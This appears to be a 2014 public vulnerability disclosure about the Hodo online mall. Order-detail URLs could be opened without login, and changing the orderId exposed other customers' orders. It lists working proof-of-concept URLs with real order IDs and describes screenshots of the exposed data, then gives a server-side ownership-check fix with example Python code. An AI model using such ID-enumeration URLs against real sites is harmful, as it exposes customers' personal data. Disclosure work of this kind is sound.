Vulnerability details

Disclosure status:

2014-02-10: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed publicly
2014-05-11: The vendor has chosen to ignore the vulnerability; details disclosed to the public

Summary:

After a user places an order and clicks to view it, the link's URL embeds a second, unvalidated URL that displays the user's order information. That embedded URL can be opened without being logged in and takes the orderId straight from the query string, which is the root of the vulnerability.

Details:

I registered an account on the Hodo (红豆) mall to try it out, picked a random product, filled in the order, confirmed it and then viewed the order details. The URL is as follows:

https://www.hodo.cn/webapp/wcs/stores/servlet/AjaxLogonForm?catalogId=10001&langId=-7&storeId=10151&krypto=JeuX%2BVEXYJDb5ICN8N5ebOfDqYAM9VLjrCb%2BL42et5s%3D&ddkey=http:AjaxLogonForm#https%3A%2F%2Fwww.hodo.cn%2Fmall%2FAjaxHistoryOrdersView%3FbreadCrumb%3DBrcmb%26currentSelection%3DOrderDetailSlct%26objectIdParam%3DorderId%26catalogId%3D10001%26langId%3D-7%26orderId%3D3720529%26storeId%3D10151%26orderStatusCode%3D%26identifier%3D1392122503362

Hard on the eyes, so I decoded it.

[screenshot: sshot-1.png]

https://www.hodo.cn/webapp/wcs/stores/servlet/AjaxLogonForm?catalogId=10001&langId=-7&storeId=10151&krypto=JeuX+VEXYJDb5ICN8N5ebOfDqYAM9VLjrCb+L42et5s=&ddkey=http:AjaxLogonForm#https://www.hodo.cn/mall/AjaxHistoryOrdersView?breadCrumb=Brcmb&currentSelection=OrderDetailSlct&objectIdParam=orderId&catalogId=10001&langId=-7&orderId=3720529&storeId=10151&orderStatusCode=&identifier=1392122503362

As you can see, it embeds another address:

https://www.hodo.cn/mall/AjaxHistoryOrdersView?breadCrumb=Brcmb&currentSelection=OrderDetailSlct&objectIdParam=orderId&catalogId=10001&langId=-7&orderId=3720529&storeId=10151&orderStatusCode=&identifier=1392122503362

Opening this address on its own shows the order information:

[screenshot: sshot-2.png]

So, can the order information be viewed without being logged in? I opened the address in a different browser, and sure enough, it is shown directly.

Naturally I changed the parameters to see if there were any surprises, and found that changing the orderId value in the URL above is enough to view other users' information.

The case orderId = 3720528:

https://www.hodo.cn/mall/AjaxHistoryOrdersView?breadCrumb=Brcmb&currentSelection=OrderDetailSlct&objectIdParam=orderId&catalogId=10001&langId=-7&orderId=3720528&storeId=10151&orderStatusCode=&identifier=1392122503361

[screenshot: sshot-3.png]

The case orderId = 3720518:

https://www.hodo.cn/mall/AjaxHistoryOrdersView?breadCrumb=Brcmb&currentSelection=OrderDetailSlct&objectIdParam=orderId&catalogId=10001&langId=-7&orderId=3720518&storeId=10151&orderStatusCode=&identifier=1392122503361

[screenshot: sshot-4.png]

Proof of vulnerability:

The case orderId = 3720528:

https://www.hodo.cn/mall/AjaxHistoryOrdersView?breadCrumb=Brcmb&currentSelection=OrderDetailSlct&objectIdParam=orderId&catalogId=10001&langId=-7&orderId=3720528&storeId=10151&orderStatusCode=&identifier=1392122503361

[screenshot: sshot-3.png]

The case orderId = 3720518:

https://www.hodo.cn/mall/AjaxHistoryOrdersView?breadCrumb=Brcmb&currentSelection=OrderDetailSlct&objectIdParam=orderId&catalogId=10001&langId=-7&orderId=3720518&storeId=10151&orderStatusCode=&identifier=1392122503361

[screenshot: sshot-4.png]

Fix:

Add verification: check that the requester is logged in and that the requested orderId belongs to that account before rendering the order.
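As an added example (not the site's code), the server-side check that the fix refers to: the order is rendered only when the user taken from the server-side session owns the requested orderId. The Order type, the sample order table, the owner ids and the unchecked handler shown for contrast are assumptions made for this illustration.

```python
from dataclasses import dataclass
from typing import Optional, Tuple


@dataclass(frozen=True)
class Order:
    order_id: int
    owner_user_id: int
    summary: str


# Constructed sample data standing in for the shop's order table. The order
# ids are the ones quoted in the report; the owners and summaries are made up.
ORDERS = {
    3720529: Order(3720529, 101, "order placed by user 101"),
    3720528: Order(3720528, 102, "order placed by user 102"),
    3720518: Order(3720518, 103, "order placed by user 103"),
}


def view_order_unchecked(order_id: int) -> Optional[Order]:
    """The behaviour the report describes: any orderId is rendered for anyone."""
    return ORDERS.get(order_id)


def view_order(order_id: int, session_user_id: Optional[int]) -> Tuple[str, Optional[Order]]:
    """Fixed handler.

    Returns ("ok", order), ("login_required", None) or ("denied", None).
    session_user_id must come from the server-side session, never from the
    request, so the client cannot influence the ownership check.
    """
    if session_user_id is None:
        return ("login_required", None)
    order = ORDERS.get(order_id)
    # Same answer for "no such order" and "not your order", so the response
    # does not reveal which order ids exist.
    if order is None or order.owner_user_id != session_user_id:
        return ("denied", None)
    return ("ok", order)
```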

Copyright notice: reposts must credit the source, Bx熊熊@乌云


Vulnerability response

Vendor response:

The vendor could not be reached or actively declined

Vulnerability rating: